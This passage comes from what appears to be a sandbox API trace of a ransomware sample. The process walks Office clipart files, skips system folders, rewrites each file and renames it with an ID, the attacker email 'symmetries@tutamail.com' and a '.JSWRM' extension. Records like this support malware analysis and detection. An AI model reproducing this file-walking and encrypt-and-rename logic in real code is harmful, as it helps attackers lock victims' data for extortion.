nFileSizeLow=0x2454, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00681_.WMF", cAlternateFileName="")) returned 1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2=".") returned 1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="..") returned 1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="...") returned 1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="windows") returned -1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="recovery") returned -1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="perflogs") returned -1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="documents and settings") returned 1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="system volume information") returned -1 [0079.019] lstrcmpiW (lpString1="HH00681_.WMF", lpString2="msocache") returned -1 [0079.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0079.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00681_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00681_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00681_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0079.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0079.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00681_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00681_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00681_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0079.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0079.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.019] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0079.019] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.020] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9300) returned 1 [0079.020] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2450) returned 0x24d210 [0079.020] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2450, lpOverlapped=0x0) returned 1 [0079.023] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.023] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2450, lpOverlapped=0x0) returned 1 [0079.023] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.023] CloseHandle (hObject=0x314) returned 1 [0079.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0079.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0079.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0079.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0079.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0079.024] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0079.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0079.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.024] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00681_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00681_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0079.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0079.025] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf9cafe, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xfc0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00685_.WMF", cAlternateFileName="")) returned 1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2=".") returned 1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="..") returned 1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="...") returned 1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="windows") returned -1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="recovery") returned -1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="perflogs") returned -1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="documents and settings") returned 1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="system volume information") returned -1 [0079.025] lstrcmpiW (lpString1="HH00685_.WMF", lpString2="msocache") returned -1 [0079.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00685_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00685_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00685_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0079.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00685_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00685_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00685_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0079.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0079.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0079.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.026] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4032) returned 1 [0079.026] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xfc0) returned 0x23fc98 [0079.026] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xfc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xfc0, lpOverlapped=0x0) returned 1 [0079.027] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.027] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xfc0, lpOverlapped=0x0) returned 1 [0079.027] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0079.028] CloseHandle (hObject=0x314) returned 1 [0079.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0079.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0079.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0079.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0079.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0079.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0079.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0079.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00685_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00685_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0079.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0079.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0079.029] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10f4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00687_.WMF", cAlternateFileName="")) returned 1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2=".") returned 1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="..") returned 1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="...") returned 1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="windows") returned -1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="recovery") returned -1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="perflogs") returned -1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="documents and settings") returned 1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="system volume information") returned -1 [0079.029] lstrcmpiW (lpString1="HH00687_.WMF", lpString2="msocache") returned -1 [0079.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0079.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00687_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00687_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00687_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0079.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00687_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00687_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00687_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0079.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0079.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.030] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4340) returned 1 [0079.030] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10f0) returned 0x205850 [0079.030] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x10f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x10f0, lpOverlapped=0x0) returned 1 [0079.031] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.031] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x10f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x10f0, lpOverlapped=0x0) returned 1 [0079.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0079.032] CloseHandle (hObject=0x314) returned 1 [0079.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0079.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0079.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0079.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0079.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0079.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0079.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0079.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0079.032] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00687_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00687_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0079.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0079.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0079.033] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdf76988, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdf76988, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdf76988, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1bac, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="HH00688_.WMF", cAlternateFileName="")) returned 1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2=".") returned 1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="..") returned 1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="...") returned 1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="windows") returned -1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="recovery") returned -1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="perflogs") returned -1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="documents and settings") returned 1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="system volume information") returned -1 [0079.033] lstrcmpiW (lpString1="HH00688_.WMF", lpString2="msocache") returned -1 [0079.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0079.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00688_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00688_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HH00688_.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0079.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0079.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HH00688_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.033] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 